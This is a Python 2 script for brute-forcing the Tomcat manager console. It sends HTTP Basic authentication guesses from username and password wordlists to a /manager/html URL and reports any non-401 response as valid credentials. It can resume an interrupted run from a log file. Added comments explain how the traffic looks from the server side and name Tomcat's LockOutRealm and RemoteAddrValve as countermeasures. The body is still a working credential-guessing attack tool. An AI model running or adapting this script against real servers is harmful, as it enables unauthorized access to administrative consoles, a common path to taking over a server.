Tomcat manager console bruteforce
"""
Tomcat bruteforce
Author: @itsecurityco

Python 2 script (print statements, raw_input) that sends HTTP Basic
authentication attempts to a Tomcat manager URL, one request per
username/password pair taken from two wordlist files.
"""
import os
import sys
import getopt
import base64
# Third-party HTTP client; every other import is standard library.
import requests
from time import sleep
def usage():
    """Print the command-line synopsis for this script."""
    synopsis = (
        "## Usage ##",
        "tomcat.py --host 127.0.0.1 --port <8080> --path </manager/html> --usr path_file --pwd path_file",
    )
    for line in synopsis:
        print(line)
def info(host, port, path, usr_path, pwd_path):
    """Show the run configuration and block until the operator confirms.

    Prints the target URL and the two wordlist paths, then waits on
    raw_input(); despite the prompt text, a full line (Enter) is required.
    """
    target = "http://%s:%d%s" % (host, port, path)
    print("# Target: %s" % target)
    print("# Usernames: %s" % usr_path)
    print("# Passwords: %s" % pwd_path)
    raw_input("# Press any key to start ...")
def log(log_file):
    """Consume the resume file left by an earlier run.

    Returns False when log_file does not exist. Otherwise the file is read,
    deleted, and its stripped content is returned split on "::::::"
    (bruteforce() writes it as "username::::::password").
    """
    if not os.path.isfile(log_file):
        return False

    handle = open(log_file, "r")
    saved = handle.read()
    handle.close()

    # The resume marker is single-use: remove it once it has been read.
    os.remove(log_file)
    return saved.strip().split("::::::")
def bruteforce(host, port, path, usr_path, pwd_path, log_file):
    """Send one HTTP Basic auth request per username/password pair.

    Arguments:
        host, port, path: parts of the ``http://host:port/path`` URL requested.
        usr_path, pwd_path: wordlist files, one candidate per line.
        log_file: single-entry resume file, consumed by log() at start-up
            and rewritten whenever a request raises.

    Returns nothing; progress and results are printed to stdout.

    Seen from the server side this is a run of GET requests for one path
    from one client, each with the same fixed Firefox 46 User-Agent and a
    different Authorization header, almost all answered 401. The password
    loop is the outer loop, so consecutive requests cycle through the
    usernames; failed logins should therefore be counted per source address
    as well as per account. Tomcat's LockOutRealm and an address restriction
    on the manager application (RemoteAddrValve) are the usual controls
    against this kind of guessing.

    NOTE(review): the indentation below was reconstructed from a listing
    that had lost it; confirm the nesting against the original file.
    """
    # Both wordlists are read fully into memory; the file objects are not
    # closed explicitly.
    usernames = open(usr_path, 'r').read().splitlines()
    passwords = open(pwd_path, 'r').read().splitlines()
    # Static browser-like headers, identical on every request.
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Cache-Control": "max-age=0"}
    # Pair saved by an earlier run, or False when no resume file exists.
    session = log(log_file)
    # Hits, keyed by username: a later hit for the same user overwrites an
    # earlier one.
    creds = {}
    for pwd in passwords:
        for usr in usernames:
            # Resume mode: skip pairs until the saved one is reached, then
            # clear the marker, pause five seconds and fall through so that
            # pair is sent again.
            if session != False:
                if session[0] == usr and session[1] == pwd:
                    print "# Reading %s file from '%s:%s' " % (log_file, usr, pwd)
                    session = False
                    sleep(5)
                else:
                    continue
            # Basic auth is only base64, and the URL below is plain http://,
            # so every candidate credential crosses the network in the clear.
            headers["Authorization"] = "Basic %s" % base64.b64encode("%s:%s" % (usr, pwd))
            print "[*] Trying '%s:%s' ..." % (usr, pwd)
            try:
                res = requests.get("http://%s:%d%s" % (host, port, path), headers=headers)
                # Any status other than 401 is reported as a hit, so e.g. a
                # 403 or 404 response is also printed as "Credentials found".
                if res.status_code != 401:
                    print "[!] Credentials found: %s:%s" % (usr, pwd)
                    creds[usr] = pwd
            except:
                # Bare except: whatever the try body raises ends up here.
                # The current pair overwrites log_file so log() can pick it
                # up on the next run; nothing in this handler stops the loop.
                handle = open(log_file, "w")
                handle.write("%s::::::%s" % (usr, pwd))
                handle.close()
    # The summary prints the collected credentials in clear text to stdout.
    if len(creds) > 0:
        print "## Summary ##"
        print creds
    else:
        print "## No passwords found ##"
def main():
    """Parse the command line, show the run banner, then start the attempts.

    Recognised long options: --host, --port, --path, --usr, --pwd, plus
    -h/--help. --port is converted with int(); a non-numeric value raises
    ValueError, which is not caught here.
    """
    # Defaults used when the matching option is not supplied.
    port = 8080
    path = "/manager/html"
    log_file = "tomcat.log"

    try:
        parsed, _positional = getopt.getopt(
            sys.argv[1:],
            "h",
            ["help", "host=", "port=", "path=", "usr=", "pwd="],
        )
    except getopt.GetoptError as err:
        print(str(err))
        usage()
        exit(1)

    # No options at all: show the synopsis and stop.
    if not parsed:
        usage()
        exit(0)

    for flag, value in parsed:
        if flag == "-h" or flag == "--help":
            usage()
            exit(0)
        elif flag == "--host":
            host = value
        elif flag == "--port":
            port = int(value)
        elif flag == "--path":
            path = value
        elif flag == "--usr":
            usr_path = value
        elif flag == "--pwd":
            pwd_path = value
        else:
            assert False, "unhandled option"

    # NOTE: host, usr_path and pwd_path have no defaults, so leaving any of
    # them off the command line raises UnboundLocalError on the next line.
    info(host, port, path, usr_path, pwd_path)
    bruteforce(host, port, path, usr_path, pwd_path, log_file)
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()